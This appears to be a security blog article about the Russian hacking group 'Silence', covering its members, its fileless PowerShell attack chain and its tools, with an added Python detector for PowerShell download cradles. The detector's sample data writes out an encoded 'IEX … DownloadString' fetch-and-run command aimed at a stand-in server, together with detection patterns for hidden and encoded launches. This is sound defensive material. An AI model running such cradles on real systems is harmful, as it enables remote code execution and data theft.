By Des Nnochiri
Recent news has broken about a group of hackers which appears to be operating out of Russia. The group, dubbed “Silence,” is believed to be involved in the theft of over $800,000 from multiple Russian and Eastern European financial institutions.
However, what is particularly notable about this group is that it seems to count at least one former cyber security professional among its number. This may help explain why the group has gone relatively unnoticed since its first suspected attack back in 2016.
Silence is presently believed to be only a two-man operation, which may be why the amount stolen is relatively small at this stage, but the presence of a member with industry knowledge and experience gives the fledgling organization significant potential.
The cyber security expert will have in-depth knowledge of security protocols and penetration testing, which will allow him to operate within the networks of financial institutions without being detected. This member’s job is to gain access to the target organization’s protected systems and initiate the theft process.
The second is the developer. This member is a highly skilled computer technician when it comes to reverse engineering, although some errors have been spotted in his code, which suggests he may not be a particularly competent programmer. The developer’s role in Silence is to produce the tools used in the attacks and to modify existing software so that it can be used in them.
One of the ways in which the group carries out its attacks is with a technique known as “living off the land”, that is, exploiting infrastructure that is already in place.
Living off the Land Attacks
These kinds of attacks exploit tools which the targets already have installed on their systems, or run simple scripts and shellcode directly in the computer’s memory.
Living off the land attacks are successful because they require little manpower to initiate, making them ideal for smaller operations such as Silence, and they can hide in plain sight by not creating any new files on the host machine. Most people recognize an attack when suspicious files show up on their hard drive, so if an attacker can avoid this, they stand a greater chance of remaining undetected for long enough to complete their mission.
Living off the land attacks usually begin with a spear-phishing email, a strategy that Silence has proven to be very competent at, with the bogus email driving the victim to a website. Once the target has gone to the website, Flash is loaded. Flash is a useful tool for living off the land hackers, as it’s absolutely riddled with security vulnerabilities.
Flash will then force Windows PowerShell to load and will begin instructing the OS through the command line. Remember, this is all happening in your computer’s memory. Nothing is being installed or downloaded onto your machine. Finally, PowerShell connects to the hacker’s stealth server and downloads a malicious script. This script then seeks out sensitive data on the host machine and begins uploading to the hacker’s servers.
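The chain described above leaves no new file on disk, so the place to catch it is process-creation telemetry: PowerShell started by a browser or plugin host, launched hidden or with an encoded command, and running a download-and-execute cradle. The following detection logic is an added example, not code from the article or from any vendor; the event records and the server name are constructed for illustration and the field layout mimics a Sysmon-style process-creation log.

```python
import base64
import re

# Constructed process-creation events (not real telemetry):
# (parent image, child image, command line). Event 1 mimics the article's chain:
# a browser plugin host spawning a hidden, encoded PowerShell download cradle.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://stealth.example/s.ps1')"
    .encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe notes.txt"),
    (r"C:\Program Files\Browser\plugin-container.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -nop -w hidden -EncodedCommand " + ENCODED),
    (r"C:\Windows\System32\cmd.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell.exe -File C:\scripts\backup.ps1"),
]

BROWSER_HOSTS = {"chrome.exe", "firefox.exe", "iexplore.exe", "plugin-container.exe", "flashplayerplugin.exe"}
CRADLE = re.compile(r"DownloadString|DownloadFile|Net\.WebClient|Invoke-Expression|\bIEX\b|Invoke-WebRequest", re.I)
HIDDEN = re.compile(r"-nop\b|-noprofile|-w(?:indowstyle)?\s+hidden|-e(?:c|nc|ncodedcommand)\s", re.I)
ENC_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)

def leaf(path):
    """Basename that also works for Windows paths when the analysis runs on another OS."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def expand_encoded(cmdline):
    """Append the decoded -EncodedCommand payload (base64 of UTF-16LE) so cradle keywords are visible."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return cmdline
    try:
        return cmdline + " ## decoded: " + base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return cmdline

def score_event(parent, image, cmdline):
    """Return the indicators that make a PowerShell launch look like an in-memory cradle; [] if none."""
    if leaf(image) != "powershell.exe":
        return []
    reasons = []
    if leaf(parent) in BROWSER_HOSTS:
        reasons.append("spawned by browser/plugin host")
    if HIDDEN.search(cmdline):
        reasons.append("hidden, no-profile or encoded launch")
    if CRADLE.search(expand_encoded(cmdline)):
        reasons.append("download-and-execute cradle (no file written)")
    return reasons

def find_suspicious(events, min_reasons=2):
    """(index, reasons) for every event that hits at least min_reasons indicators."""
    scored = [(i, score_event(*ev)) for i, ev in enumerate(events)]
    return [(i, r) for i, r in scored if len(r) >= min_reasons]
```

Only the browser-spawned, hidden, encoded launch is reported; the scheduled backup script run from cmd.exe is not, which is the distinction that keeps such a rule usable on a real fleet.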
The information gathered can then be used for a host of nefarious purposes. At its most basic, the information can be used to steal money. Alternatively, passwords and other security information can give the hacker the ability to conduct ransomware attacks, where the information is held or threatened with public dissemination unless the victim pays the ransom.
At its most high-profile, living off the land can be used to bring down corporations or even attempt to influence elections. One such attack allowed Russian hackers to access thousands of emails from a high-ranking Democrat during the 2016 US Presidential race and may be part of the reason why Hillary Clinton does not presently occupy the White House.
The above process is just one way living off the land attacks can be carried out; the number of possible variations is almost unlimited.
The Silence Toolbox
Silence uses a few proprietary tools to help carry out its attacks.
The eponymous framework is a modular software package with four components discovered so far:
– Downloader, a loader
– Main module called Silence and a patched backdoor called Kikothac
– SurveillanceModule, a module for spying on users
– ProxyBot, a proxy module
These modules allow the living off the land attack to be carried out. Once they have been planted on the host machine, the attacker can begin harvesting data or funds.
A second tool is designed specifically for attacking ATMs and allows the attacker to directly control the dispensing of funds. This means they could simply empty the contents of the ATM onto the street in a purely anarchic attack, or into the hands of a waiting associate in the much more common financially motivated crime.
Farse is a tool which can harvest passwords from an infected machine, allowing the attacker access to even more systems, including bank accounts and private email servers, ripe for ransomware crimes.
As its name suggests, Cleaner deletes all evidence of the remote connection once the attack has been completed. This works in the attacker’s favor by increasing the time it takes for the crime to be discovered and further reducing the chances of capture.
Silence is just one of the latest in a long line of hacker organizations out to disrupt our lives and steal our money or data. However, bringing these organizations and their methods out of the shadows and into the light remains our best weapon against them.